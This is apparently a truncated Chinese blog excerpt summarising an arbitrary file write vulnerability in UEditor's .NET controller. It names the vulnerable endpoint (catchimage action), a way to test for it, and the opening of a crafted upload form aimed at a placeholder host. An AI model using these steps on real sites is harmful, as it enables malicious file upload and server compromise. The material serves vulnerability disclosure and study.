摘要：···漏洞原理 在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞 ··· 访问/uedit/net/controller.ashx?action=catchimage 若存在抓取源报错，则存在漏洞 本地构造上传文件 <form action="http://xxx.xxx.xxx.xx 阅读全文